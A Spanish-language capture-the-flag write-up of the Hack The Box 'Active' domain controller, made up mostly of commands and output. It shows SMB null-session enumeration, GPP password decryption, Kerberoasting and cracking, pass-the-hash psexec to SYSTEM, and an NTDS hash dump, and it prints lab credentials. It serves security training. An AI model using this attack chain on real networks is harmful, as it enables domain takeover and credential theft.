Active HTB - WriteUp

Enumeración

En esta ocasión nos estamos enfrentando a una máquina Windows. Lo primero que hacemo es un escaneo de nmap y podemos encontrar los siguientes puertos abiertos:

❯ nmap -sC -sV -Pn -n -oN Extraction -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49170,49171 10.10.10.100
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-02-18 20:57 CET
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.46% done; ETC: 20:58 (0:00:00 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.093s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-18 19:57:51Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC

De este escaneo sacamos varias cosas en claro:

  • Estamos ante una máquina windows.
  • El nombre del dominio es active.htb -> Lo metemos en /etc/hosts
  • Esta expuesto SMB, Kerberos y LDAP

Lo primero que haré será enumerar el SMB haciendo uso de NULL SESSION. Para ello usare CrackMapExec.

❯ crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [-] active.htb\: STATUS_ACCESS_DENIED 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share 
SMB         10.10.10.100    445    DC               Users

Explotación

Tenemos acceso de lectura sobre Replication, nos podemos conectar con smbclient. Enumerando podemos encontrar un archivo llamado Groups.xml

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 22:46:06 2018

El contenido del archivo es el siguiente:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Este archivo de politicas de grupo contiene un nombre de usuario y una contraseña cifrada con AES-256 no será un problema romperla debido a que Microsoft publico la clave AES. Podemos usar el script de este repositorio para desencriptar la password https://github.com/t0thkr1s/gpp-decrypt

❯ python3 gpp-decrypt.py -f Groups.xml

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18

Probaremos si la password es valida a traves de CrackMapExec.

❯ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

La contraseña es valida, ademas de eso el nombre de usuario me llama la atención… SVC_TGS (Ticket Granting Service) voy a probar un ataque de Kerberoasting para recoger un ticket TGS e intentar romperlo. Podemos realizar un ataque de Kerberoasting porque disponemos de credenciales validas.

❯ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-02-18 20:54:47.472133             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b40abe0fdb1dfa6579ff75a92ea9c7f6$ad6494a48031fa492cb90337ae9e3a0ded51fb402beb42f2cfd2fdc075d1dbc798493479acd9a5421faf5dcd6cf0154533c5f40e44229565ba0798579cf728edd6534af67c69e6075b07900c06aa89d3633f63e7b0e486aef25a9805ea4eae886180369bc299c8c95f032a6dc7637c67105597ba8ab926e6409ca2486a83e79de021ef87e18dead039891fc30af2cf8a3978035167f40c9eb02f6d9d686cbdee5f5344254fa010ec3c28a6166613dae31dbb136f02c8b1ff37f77ac6839be9633dd2877f673fa5c5e6eef28816df8c752604605baee8d382529e7c990eb7c2af7b5c4e045921bdcdd9817c6646053e2cad902f48c1c3ab54205a4c1d6abff5598a20d2fca1677dc65a50ca2cb9c338cf6a619b039c3617569eabcfe38e4a59b6acd3013a9b48e84a315504524640c5f400714129b34ce79a8b3d3fe6df5cbcfa7b471fa1f08ff2273211930af24f8616959269c9d85f0b528a91839bc68ce237d686fcc34e4ae84112835cab9a0d71660697c8c789cb4e5f31e5d55744ca89b658a66643ca5cc39bb06086320f85d1ce13b78282d9492b46f3209541bb6040459030ece46e0f8477f1c7e535e20ef71e16c8f02a3008d162d5fd8659bb88ef0b4ede9ed77d1f2f45bd7221538a31d5f04a18fc6f5b3c937985e5c59be9748f83b377d8eeb8001fe805e6876577598dc5d1297b95a8f28bb5744c4f07f3352b3832274f88e22f78c58a3228cb92aefee731927bcb3330cc648573f8f3f3bca88a29ba067fabc9b7ed5285ad9b4f7f6c73f0ba899413796e72ca4fbf6dd1457f51b91eb6c2f37e8b54fa4663dd04563b39cb952091b1b8db43bf9b1a28f52c7e94b718681430ba5b33df898e94cf1add9eb30bd89e213d30b728050e1854bc4ceca498f4563965ecb6f57da4cbabbc82276e97fa73fc7ee65682cdffe87de318946de6fa0bf51266da1a9d3fbe4f18425ca7d3df121ea6a0bd33ee8d8205435e69b72858d1f3d5b28c22d82ed69b6999d79b6781db49a01a072d4bbf2728216df43fac06353312c210eb7d3e7d3bd97b8f23a7e3b61ac6edb7157d464ec873175006cf8787ef61bc0bcdb280a1f30a7af837c920f331910b6d31de4ba6dde447ac207f9a0de53e158e8ddb9e7937e010d4c509ae57f20ce88f9d7f6e85586786f6eb274b10cd0c161e18e584f8ac6a7f42b55de612d1f2c2b138234bca030baada574c1ae3f2a0c702c12d8a61a1206915a05b7e608a3979ee8807

Vamos a probar romper el HASH haciendo uso de john pasandole como dicc rockyou.

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:05 DONE (2023-02-18 21:29) 0.1715g/s 1807Kp/s 1807Kc/s 1807KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Hemos sacado roto el hash y el ticket le pertenecía al Administrador. Vamos a probar a si la password es valida.

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)

Es valida, hemos pwneado el dominio. Podemos ganar acceso con psexec haciendo uso de la contraseña o haciendo uso de pass the hash si disponemos del hash.

❯ psexec.py Administrator@10.10.10.100 -hashes :5ffb4aaaf9b63dc519eca04aec0e8bed
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file jegBGkCy.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service TzTy on 10.10.10.100.....
[*] Starting service TzTy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

EL hash podemos extraerlo de la base de datos NTDS.

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --ntds
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.100    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
SMB         10.10.10.100    445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.100    445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
SMB         10.10.10.100    445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:129286708a36e7a07e5216860aa1d5ce:::
SMB         10.10.10.100    445    DC               Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
SMB         10.10.10.100    445    DC               Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
SMB         10.10.10.100    445    DC               Administrator:des-cbc-md5:5891549b31f2c294
SMB         10.10.10.100    445    DC               krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
SMB         10.10.10.100    445    DC               krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
SMB         10.10.10.100    445    DC               krbtgt:des-cbc-md5:9d044f891adf7629
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
SMB         10.10.10.100    445    DC               active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
SMB         10.10.10.100    445    DC               DC$:aes256-cts-hmac-sha1-96:209553ecb6ca014a29dcf817a83df8a02965ddd60ece3f76fffe5d4aa396b017
SMB         10.10.10.100    445    DC               DC$:aes128-cts-hmac-sha1-96:61e049be54b6fe4569757f63f1f2a85a
SMB         10.10.10.100    445    DC               DC$:des-cbc-md5:23d6c1f4131c51d3

Espero que te haya servido!